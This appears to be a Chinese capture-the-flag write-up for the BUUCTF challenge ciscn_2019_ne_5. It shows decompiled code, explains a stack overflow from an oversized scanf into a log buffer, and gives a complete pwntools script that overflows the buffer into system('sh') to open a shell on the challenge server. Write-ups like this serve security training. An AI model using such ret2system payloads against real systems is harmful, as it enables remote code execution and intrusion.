zoukankan      html  css  js  c++  java
  • BUUCTF PWN ciscn_2019_ne_5

    int __cdecl main(int argc, const char **argv, const char **envp)
    {
      int result; // eax
      int v4; // [esp+0h] [ebp-100h] BYREF
      char src[4]; // [esp+4h] [ebp-FCh] BYREF
      char v6[124]; // [esp+8h] [ebp-F8h] BYREF
      char s1[4]; // [esp+84h] [ebp-7Ch] BYREF
      char v8[96]; // [esp+88h] [ebp-78h] BYREF
      int *p_argc; // [esp+F4h] [ebp-Ch]
    
      p_argc = &argc;
      setbuf(stdin, 0);
      setbuf(stdout, 0);
      setbuf(stderr, 0);
      fflush(stdout);
      *(_DWORD *)s1 = 48;
      memset(v8, 0, sizeof(v8));
      *(_DWORD *)src = 48;
      memset(v6, 0, sizeof(v6));
      puts("Welcome to use LFS.");
      printf("Please input admin password:");
      __isoc99_scanf("%100s", s1);
      if ( strcmp(s1, "administrator") )
      {
        puts("Password Error!");
        exit(0);
      }
      puts("Welcome!");
      puts("Input your operation:");
      puts("1.Add a log.");
      puts("2.Display all logs.");
      puts("3.Print all logs.");
      printf("0.Exit\n:");
      __isoc99_scanf("%d", &v4);
      switch ( v4 )
      {
        case 0:
          exit(0);
          return result;
        case 1:
          AddLog(src);
          result = sub_804892B(argc, argv, envp);
          break;
        case 2:
          Display(src);
          result = sub_804892B(argc, argv, envp);
          break;
        case 3:
          Print();
          result = sub_804892B(argc, argv, envp);
          break;
        case 4:
          GetFlag(src);
          result = sub_804892B(argc, argv, envp);
          break;
        default:
          result = sub_804892B(argc, argv, envp);
          break;
      }
      return result;
    }
    
    int __cdecl GetFlag(char *src)
    {
      char dest[4]; // [esp+0h] [ebp-48h] BYREF
      char v3[60]; // [esp+4h] [ebp-44h] BYREF
    
      *(_DWORD *)dest = 48;
      memset(v3, 0, sizeof(v3));
      strcpy(dest, src);
      return printf("The flag is your log:%s\n", dest);
    }
    

    对应查看log函数

    int __cdecl AddLog(int a1)
    {
      printf("Please input new log info:");
      return __isoc99_scanf("%128s", a1);
    }
    

    a1就是外面的src,程序给的大小是48
    通过 __isoc99_scanf("%100s", s1); //
    选择1 可以__isoc99_scanf("%128s", a1); 溢出到 bin/sh 选择4
    然后选4去调用读取我们构造好的栈,获取shell

    于是查找可用字符串 system

    system_addr=elf.sym['system']
    

    尝试用ROPgadget来搜索一下程序里的’/bin/sh’字符串的地址的,没有找到,但是发现有‘sh’字符串,这个效果和‘/bin/sh’是一样的效果

    ROPgadget --binary ciscn_2019_ne_5 --string 'sh' 
    

    sh_addr=0x080482ea

    这样我们就可以构造我们的payload=‘a’*(0x48+4)+p32(system_addr)+‘aaaa’+p32(sh_addr)
    之后选4去调用我们的这个构造好的栈即可获取shell

    from pwn import *
    from LibcSearcher import *
    context.log_level = 'debug'
    
    
    r = remote("node4.buuoj.cn", 29919)
    # r = process("./pwn2_sctf_2016")
    elf = ELF("ciscn_2019_ne_5")
    
    system_addr=elf.sym['system']
    
    # printf_plt = elf.plt['printf']
    # printf_got = elf.got['printf']
    #start = elf.sym['_start']
    
    
    #payload = flat([ 'a'*(0x2c+4), printf_plt, start, printf_got ])
    #r.sendlineafter("How many bytes do you want me to read?", "-1")
    #r.sendlineafter("of data!", payload)
    #r.recvline()
    # r.recvline()    
    
    
    #printf_addr = u32(r.recv(4))
    # log.success("printf addr => {}".format(hex(printf_addr)))
    # libc = LibcSearcher("printf", printf_addr)
    # base = printf_addr - libc.dump("printf")
    # system = base + libc.dump("system")
    # binsh = base + libc.dump("str_bin_sh")
    
    #system = printf_addr 	-0xe6e0
    #binsh = printf_addr	    +0x11000b
    
    #payload1 = flat([ 'a'*(0x2c+4), system, start, binsh ])
    #r.sendlineafter("How many bytes do you want me to read?", "-1")
    #r.sendlineafter("of data!", payload1)
    shell_addr=0x80482ea
    
    r.recvuntil('Please input admin password:')
    r.sendline('administrator')
    
    r.recvuntil('0.Exit\n:')
    r.sendline('1')
    
    payload='a'*(0x48+4)+p32(system_addr).decode('unicode_escape')+'1234'+p32(shell_addr).decode('unicode_escape')
    
    r.recvuntil('Please input new log info:')
    r.sendline(payload)
    
    r.recvuntil('0.Exit\n:')
    r.sendline('4')
    
    r.interactive()
    
    
    
    
  • 相关阅读:
    sql sever外网映射后链接,端口号用,号区分
    zentao事故,慢sql查询
    阿里云镜像加速器配置
    对产品不同指标维度分组求和
    burp抓包https请求
    mysql获取当天,昨天,本周,本月,上周,上月的起始时间
    查询不同sql,插入同一个sheet
    按分类查找缺陷并输出到EXCEL
    循环导出所有行和列
    查询某字段等于当天的日期sql:select count(*) from zt_bug WHERE date_format(openedDate,'%Y-%m-%d')=date_format(NOW(),'%Y-%m-%d')
  • 原文地址:https://www.cnblogs.com/socialbiao/p/15695124.html
Copyright © 2011-2022 走看看